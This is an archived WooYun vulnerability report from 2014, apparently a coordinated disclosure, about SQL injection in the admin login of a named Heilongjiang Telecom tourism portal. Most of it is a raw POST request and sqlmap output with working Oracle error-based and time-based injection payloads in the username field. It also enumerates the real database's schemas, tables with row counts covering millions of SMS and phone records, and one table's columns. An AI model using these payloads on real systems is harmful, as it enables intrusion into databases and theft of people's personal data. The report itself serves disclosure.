乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-11: 细节已通知厂商并且等待厂商处理中 2014-11-14: 厂商已经确认,细节仅向厂商公开 2014-11-24: 细节向核心白帽子及相关领域专家公开 2014-12-04: 细节向普通白帽子公开 2014-12-14: 细节向实习白帽子公开 2014-12-26: 细节向公众公开
没错是千万错是千万是千万千万万...
黑龙江电信数字旅游门户网站_后台管理维护链接:http://www.gzbg100.cn/sysadmin/Login.aspx
登陆处存在注入,用户名密码输入',直接报错
验证码只会验证是否有效,不会过期post请求
POST /sysadmin/Login.aspx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://www.gzbg100.cn/sysadmin/Login.aspxAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: www.gzbg100.cnContent-Length: 361Proxy-Connection: Keep-AlivePragma: no-cacheCookie: ASP.NET_SessionId=w0ctrju5zcbqdw55uiot0h45__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJOTI4MjE5NjI1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnBmGi4hqICb4u6KAz35K7NqMua7k%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBgKXyKGvBAKl1bKzCQKd%2B7qdDgKY2YWXBgKC3IeGDAKNt7ybCQwP4hOwri06ABc6B3P7yglAd%2FNk&txtUserName=aaa&txtPwd=aaa&txtCheckCode=6146&btnLogin.x=0&btnLogin.y=0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtUserName Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7718=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(103)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7718=7718) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(102)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'dHGr'='dHGr&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7855=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uHrR'='uHrR&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'SYSMANAGER'current user is DBA: Falseavailable databases [18]:[*] COUPON[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSMANAGER[*] SYSTEM[*] TG[*] TSMSYS[*] WMSYS[*] XDBDatabase: SYSMANAGER+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| SMSSEND_BACK | 9966936 || SMS_APP_PHONES | 8387577 || TBCUSTCOUNT | 897976 || SMSSEND | 743361 || TBCOUPONCARD | 231471 || TB_GUEST_INFO | 177577 || TB_ADV_CLICK | 133270 || TEMP_SMS | 56955 || TB_COMMON_GUESTCOMMENT | 22868 || TB_SSOLOGS | 19428 || RESTINFO | 13752 || RESTPIC | 9474 || TB_LOGINFO | 8270 || TB_HDM_PICTURE | 3506 || TB_TLSUBPAGE_MAPTO_SCENIC | 884 || TB_DINING_BASICINFO | 694 || TB_TRAVEL_REGUSER | 663 || SMS_APP_MESSAGES | 609 || TBCOUPON | 595 || TB_TRAVEL_LINEPLAN | 528 || TB_KEYWORDS_FILTER | 525 || TB_NEWS_INFO | 454 || TB_SCENIC_INFO | 425 || TB_CODEDEFINE | 409 || TB_SCENIC_RESERVE | 332 || TB_AUTHORITY | 329 || TB_SCENIC_INFO_BAK_0528 | 318 || TB_COMPLAINT | 290 || TB_MARKET_INFO | 271 || TB_HOTEL_BASEINFO | 269 || TB_PLAY_BASEINFO | 261 || TB_PERFORMER_INFO | 242 || TBTERMINALTRAD | 228 || TB_USERROLE | 163 || TBMERCHANT | 157 || TB_SCENIC_BAK | 149 || TB_TRAVELINE_SUBPAGE_LEVEL2 | 149 || TB_ADV_INCOME | 141 || TB_TRAVEL_LINE | 132 || TB_ADV_DETAIL | 126 || TB_USERINFO | 124 || TB_ORDER_HOTEL | 115 || TB_VALIDCODE | 113 || TB_FUNCTIONS111 | 103 || TB_FUNCTIONSBAK | 103 || TB_FUNCTIONS | 92 || TB_RAFFLE | 60 || TB_ORDER_SCENIC | 55 || TB_TRAVEL_INFO | 48 || TB_BALANCE | 42 || TB_COMMON_PAGESETINFO | 40 || TBCATE | 40 || SMS_APP_USERINFO | 39 || TB_ADV_LIMIT | 34 || TB_ORDER_DINING | 34 || TB_ADV_INFO | 30 || TB_TRAVELINE_SUBPAGE_LEVEL1 | 28 || TB_ORDER_PLAY | 26 || MISSM_MESSAGE | 24 || TB_KNOWLEDGEBASE_INFO | 24 || TB_PAYLOG | 22 || TB_USR_INFO | 19 || TB_ROLES | 18 || TB_MISSMNEWS_INFO | 17 || TB_NEWS_COLUMN | 17 || TBCOUPOUORDER | 16 || TB_ORDER_LINE | 15 || TB_TRAVEL_BUSTYPE | 15 || TB_DINING_CUISINETYPE | 14 || TB_TRAVEL_GUIDE | 14 || TB_TRAVEL_INCOME | 14 || TB_AREA | 13 || TB_AREA_WEATHERURL | 13 || TB_BUSINESS_INFO | 13 || TB_TUAN_CITY | 13 || TB_TRAVEL_GROUP | 12 || TB_HOTEL_GROOMTYPE | 10 || TB_MOBILE_AREA | 10 || TB_MOBILE_VOUCHER | 10 || TB_MOBILE_CODEDEFINE | 9 || TB_CALENDAR | 8 || TB_MOBILE_SERVICE | 8 || TB_SHOPPING_SCENIC | 8 || TB_DEPARTMENT | 7 || TB_MOBILE_CATEGORY | 7 || TB_MOBILE_POSITION | 7 || TB_MOBILE_SPACE | 7 || TB_TUAN_DINGDAN | 7 || TB_FAVORITES | 6 || TB_MOBILE_COMPANY | 6 || TB_MOBILE_CUSTOMER | 6 || TMP_TESTORDER | 6 || TB_ADVANCE_BOOKING | 5 || TB_DINING_CUISINEINFO | 5 || TB_TRAVEL_BUSINFO | 5 || TBCOUPONUSER | 5 || TB_KNOWLEDGEBASE_TYPE | 4 || TB_MOBILE_PARAMETER | 4 || TB_MOBILE_PRODUCT | 4 || TB_PRIVILEGE | 4 || TB_TUAN_CODEDEFINE | 4 || TB_HOTEL_RESERVE | 3 || TB_MOBILE_BOOKING | 3 || TB_ORDER_THEMES | 3 || TB_SSOSITE | 3 || TB_TUAN_USER | 3 || TB_MOBILE_ADDRESS | 2 || TB_MOBILE_ALBUM | 2 || TB_MOBILE_MEDIA | 2 || TB_MOBILE_SESSION | 2 || TB_NEWS_TITLEPREV | 2 || TB_TUAN_USERRELATION | 2 || TB_BARCODE_CONFIG | 1 || TB_MOBILE_AROUND | 1 || TB_MOBILE_CAMERA | 1 || TB_MOBILE_CRITICAL | 1 || TB_MOBILE_DAILY | 1 || TB_MOBILE_LOCATION | 1 || TB_NEWS_CONTENTTEMPLATE | 1 || TB_ROLLINFO | 1 || TB_TUAN_BBS | 1 || TB_TUAN_PROJECTS | 1 || TB_VERSION | 1 |+-----------------------------+---------+Database: SYSMANAGERTable: SMSSEND_BACK[10 columns]+------------+----------+| Column | Type |+------------+----------+| ADDDATE | DATE || CONTENT | VARCHAR2 || OUT_SMSID | NUMBER || PHONENUM | VARCHAR2 || SENDDATE | DATE || SENDNUM | VARCHAR2 || SENDRESULT | NUMBER || SENDSTATUS | NUMBER || SMSID | NUMBER || TYPE | NUMBER |+------------+----------+数据就不贴了~
过滤
危害等级:中
漏洞Rank:10
确认时间:2014-11-14 17:46
暂无